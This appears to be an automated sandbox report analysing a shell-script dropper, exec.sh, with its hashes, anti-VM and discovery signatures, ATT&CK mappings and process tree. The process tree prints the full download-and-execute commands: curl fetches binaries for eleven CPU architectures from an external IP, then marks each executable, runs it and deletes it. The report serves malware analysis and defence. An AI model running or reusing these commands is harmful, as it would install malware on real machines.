bfa195bd238473bfead86e74b796c4721d1f5281c284b96ff29d8806a82a6520

Analysis

max time kernel
376s
max time network
379s
platform
debian-9_armhf
resource
debian9-armhf-20240226-en
resource tags

arch:armhfimage:debian9-armhf-20240226-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
15-03-2024 20:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

exec.sh
Size

842B
MD5

4eeac4436b9c68f85b1c3a2bae62d3f3
SHA1

4895bfd63ba3ae5fd97f69c4a243d4bae7eddfa1
SHA256

bfa195bd238473bfead86e74b796c4721d1f5281c284b96ff29d8806a82a6520
SHA512

e0091672dd843f9dd87b50f43c8b09711cd1b02c40a5a8e51a53878cdd213881328583e99d1d92aef5c497abdd3f181fe6f3a740aedb7d66918c05788bbd0e5b

Score

7^/10

antivm

Malware Config

Signatures

Executes dropped EXE 11 IoCs

Processes:

386_binaryamd64_binaryarm_binaryarm64_binarymips_binarymips64_binarymips64le_binarymipsle_binaryppc64_binaryppc64le_binarys390x_binary

ioc	pid	process
/tmp/386_binary	739	386_binary
/tmp/amd64_binary	781	amd64_binary
/tmp/arm_binary	790	arm_binary
/tmp/arm64_binary	808	arm64_binary
/tmp/mips_binary	815	mips_binary
/tmp/mips64_binary	826	mips64_binary
/tmp/mips64le_binary	838	mips64le_binary
/tmp/mipsle_binary	849	mipsle_binary
/tmp/ppc64_binary	858	ppc64_binary
/tmp/ppc64le_binary	883	ppc64le_binary
/tmp/s390x_binary	896	s390x_binary

Checks CPU configuration 1 TTPs 11 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Enumerates kernel/hardware configuration 1 TTPs 1 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery
T1082

Processes:

arm_binary

description ioc process

File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size arm_binary

description	ioc	process
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	arm_binary

Reads runtime system information 22 IoCs

Reads data from /proc virtual filesystem.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 11 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/mipsle_binary	curl
File opened for modification	/tmp/ppc64_binary	curl
File opened for modification	/tmp/ppc64le_binary	curl
File opened for modification	/tmp/386_binary	curl
File opened for modification	/tmp/amd64_binary	curl
File opened for modification	/tmp/arm64_binary	curl
File opened for modification	/tmp/mips64_binary	curl
File opened for modification	/tmp/mips64le_binary	curl
File opened for modification	/tmp/arm_binary	curl
File opened for modification	/tmp/mips_binary	curl
File opened for modification	/tmp/s390x_binary	curl

/tmp/exec.sh
/tmp/exec.sh
1⤵
PID:662

/usr/bin/curl
curl -o 386_binary http://5.10.249.153:9999/386
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:670

/bin/chmod
chmod +x 386_binary
2⤵
PID:738

/tmp/386_binary
./386_binary
2⤵
- Executes dropped EXE
PID:739

/bin/rm
rm -rf 386_binary
2⤵
PID:741

/usr/bin/curl
curl -o amd64_binary http://5.10.249.153:9999/amd64
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:742

/bin/chmod
chmod +x amd64_binary
2⤵
PID:780

/tmp/amd64_binary
./amd64_binary
2⤵
- Executes dropped EXE
PID:781

/bin/rm
rm -rf amd64_binary
2⤵
PID:783

/usr/bin/curl
curl -o arm_binary http://5.10.249.153:9999/arm
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:784

/bin/chmod
chmod +x arm_binary
2⤵
PID:789

/tmp/arm_binary
./arm_binary
2⤵
- Executes dropped EXE
- Enumerates kernel/hardware configuration
PID:790

/bin/rm
rm -rf arm_binary
2⤵
PID:794

/usr/bin/curl
curl -o arm64_binary http://5.10.249.153:9999/arm64
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:795

/bin/chmod
chmod +x arm64_binary
2⤵
PID:807

/tmp/arm64_binary
./arm64_binary
2⤵
- Executes dropped EXE
PID:808

/bin/rm
rm -rf arm64_binary
2⤵
PID:810

/usr/bin/curl
curl -o mips_binary http://5.10.249.153:9999/mips
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:811

/bin/chmod
chmod +x mips_binary
2⤵
PID:814

/tmp/mips_binary
./mips_binary
2⤵
- Executes dropped EXE
PID:815

/bin/rm
rm -rf mips_binary
2⤵
PID:817

/usr/bin/curl
curl -o mips64_binary http://5.10.249.153:9999/mips64
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:818

/bin/chmod
chmod +x mips64_binary
2⤵
PID:825

/tmp/mips64_binary
./mips64_binary
2⤵
- Executes dropped EXE
PID:826

/bin/rm
rm -rf mips64_binary
2⤵
PID:828

/usr/bin/curl
curl -o mips64le_binary http://5.10.249.153:9999/mips64le
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:830

/bin/chmod
chmod +x mips64le_binary
2⤵
PID:837

/tmp/mips64le_binary
./mips64le_binary
2⤵
- Executes dropped EXE
PID:838

/bin/rm
rm -rf mips64le_binary
2⤵
PID:840

/usr/bin/curl
curl -o mipsle_binary http://5.10.249.153:9999/mipsle
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:841

/bin/chmod
chmod +x mipsle_binary
2⤵
PID:848

/tmp/mipsle_binary
./mipsle_binary
2⤵
- Executes dropped EXE
PID:849

/bin/rm
rm -rf mipsle_binary
2⤵
PID:851

/usr/bin/curl
curl -o ppc64_binary http://5.10.249.153:9999/ppc64
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:852

/bin/chmod
chmod +x ppc64_binary
2⤵
PID:857

/tmp/ppc64_binary
./ppc64_binary
2⤵
- Executes dropped EXE
PID:858

/bin/rm
rm -rf ppc64_binary
2⤵
PID:860

/usr/bin/curl
curl -o ppc64le_binary http://5.10.249.153:9999/ppc64le
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:861

/bin/chmod
chmod +x ppc64le_binary
2⤵
PID:882

/tmp/ppc64le_binary
./ppc64le_binary
2⤵
- Executes dropped EXE
PID:883

/bin/rm
rm -rf ppc64le_binary
2⤵
PID:885

/usr/bin/curl
curl -o s390x_binary http://5.10.249.153:9999/s390x
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:886

/bin/chmod
chmod +x s390x_binary
2⤵
PID:895

/tmp/s390x_binary
./s390x_binary
2⤵
- Executes dropped EXE
PID:896

/bin/rm
rm -rf s390x_binary
2⤵
PID:898

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/386_binary
Filesize
96KB

MD5
78467b8cc11bc06bfa0088903ef2aea6

SHA1
3d449e46ac744a93b81fa17ae68d520bb1a485b8

SHA256
b10f0076d73de353b5b9662c128d8076ea5312f6b39f0f5626b52401cedcdaea

SHA512
e26221e52c96dc5a22b6f41c0d334d63d9e5b501a724d699574acdec70b84b64f2cf0ef679d4eb044e82cdb116b33368aa58a5672e2fa06ba3ba47429390a63e

Download Submit
/tmp/amd64_binary
Filesize
340KB

MD5
7ab69bc65941bd4b7be22edeceff3c95

SHA1
2ea68c4882bf66eed0ce371edd2fdac87c35d536

SHA256
db9d86506b2499e1a81a675aae5afb07d205949878b04b545d112e4f3312146d

SHA512
531b4f5bf556abde75ed101ec4256446877b461333cd45f7b9b32ea36ff2bcb9385e2e4e5c784b85d6d792dd4404cb8417cbd5c174534f54faed62daaf2f2ff6

Download Submit
/tmp/arm64_binary
Filesize
68KB

MD5
51eb00b6742c2bed9038ebbd0fa47969

SHA1
9b15e81cbb90a8891e1cdc20f769e2999f3c6cac

SHA256
8b7fbb7e4b08dd1f81a3bb457ceb52ea6c7c0abdaa8ed21aa8c2bdd9a1fa3cef

SHA512
41625da539bc9440abf0f722dfe0d85631d9d2d91a800fbdeba23539f382da564818cec5a3a13888023b3faf9082e1c453dd58eba5aa71705065d2090af6615c

Download Submit
/tmp/arm_binary
Filesize
904KB

MD5
41e96f8250e85287106c70c06ec17626

SHA1
16bbd0286f9706366e543f947a39e75a559f7d33

SHA256
67c3cd1fead9e2e3dbdddbd793138cb1717aa79e855705d9fb21ff17d56d0da0

SHA512
bd588027be7e8c3afb2626b1577f2fcb729cca891cda0d1dd0c1d17397be85d47c301255f016c78119b499f229ca2dd282f2b62de3ec7b22eaa85760d972cb65

Download Submit
/tmp/mips64_binary
Filesize
344KB

MD5
627355f16422619eb458b20532d5dfad

SHA1
4aa86dde2f5b4fa89b6f49a2fd60e55d2ad0fc65

SHA256
e6a809ef28406efd870b9db91db7ab90a39491bb5345c45da7539b18b88d1a97

SHA512
77c90e16a7b1c7ad8fc993e1db90dbdf4b0991efd6f19dafa56035e6a4ff8573e17705655c7963b53f44d801e2dc036b3a938584de71cd6668d7ee13121604f2

Download Submit
/tmp/mips64le_binary
Filesize
56KB

MD5
c368512a64acce5ae0c55ae19f339a52

SHA1
e8c68a423fbb192eca08a1df3f5378efbe80ba85

SHA256
5c8d700d80c9ea5d97a7dffa76f830dffb0507f9d0922773a08b67488c86f097

SHA512
2b108f1bfc9aa279286722669aaf830c766270b1765d4af321ee81ad5b677824a8b6366bc0579f2a06d5d8b2bce524156745625516c4c3472040760025f31a33

Download Submit
/tmp/mips_binary
Filesize
76KB

MD5
06f0d8fcc944e65810023bf2c30bc47c

SHA1
9def96584e9eca575d11b07aeb4c75c0a8277d2e

SHA256
239e28fdf5d1b805b7b793ba0e2f65a3bb01d248f21b31e33463d4212c8acef7

SHA512
1a1d4a5db9fd629f442eaa5f68acdb6e5c0e8356c3929bb5ad377aaba5487f784dd5e9f03317bdbdb6ffb6d00397cec4e6b33e40eaa87e2c31f17419f839aee5

Download Submit
/tmp/mipsle_binary
Filesize
160KB

MD5
c20acb0ceb78ce87bd3ceb789c00557f

SHA1
cff51664a84d2c12e20aacd88b49115e84100904

SHA256
14592328c7f4dfae388079f381833e3963bffc216f55bf45bf29e2c82cda2fc1

SHA512
fa3d4fb3e7d920ef00e98bc1fedb09b81977512f4790f9ea214b371dea3bf7e7aea3c2baeb7b14c4d655439b8c80a11d7189e62887c97021f36f2ec5037a6ec3

Download Submit
/tmp/ppc64_binary
Filesize
176KB

MD5
b4ecfc6c2fc8fc18088d9f591463a980

SHA1
ce7a095fdb9a919a6f8c1a2a27d12550d89ac729

SHA256
f74171322b7efd43615f6e887b81eda45c5bf478072bcc766958878476519cc3

SHA512
b898f8e87d508d4bc884977ea379fed1edee612971b5d91b92b1342787bb999c3adb563cb2cd7fe1265a7f96749b94b0d369f13af88155899bbce0ebb8da5954

Download Submit
/tmp/ppc64le_binary
Filesize
460KB

MD5
9c9c4b4ea36b8e0b402bed656bda2b3c

SHA1
b2fe7beecff50ffce99ba44875bdf43b3e9537e6

SHA256
4a39a5d11722e3f4c8ef13e9f25fead84abb2edcb65fdd624b70f2f6720f7792

SHA512
113e2901d9c261d591f8b9bee293c82fc5128fb3818e5bd563c47b61d11740eee14150bacf282f98b9c3f1d3cf743a574b3404ed5fdeff71b9bf2abc1428add9

Download Submit
/tmp/s390x_binary
Filesize
1.0MB

MD5
89d20875501b6cffcb21eac9dfa93fbc

SHA1
c83aa9f2eab8682e7955f58df4f4c6639559e03d

SHA256
3ddd07b0b7f34c21b8e193b33b7323dea3a6b020b9c07fe629d9371709d62ed7

SHA512
c296e5b2548d87da836666e124b4cc7cf39268fd9fb2c8e8eca94416f23158c9dcf2e16227530673a5ee70d859ab08b8bfd3ad9352b4d775deea511d3f4f85e2

Download Submit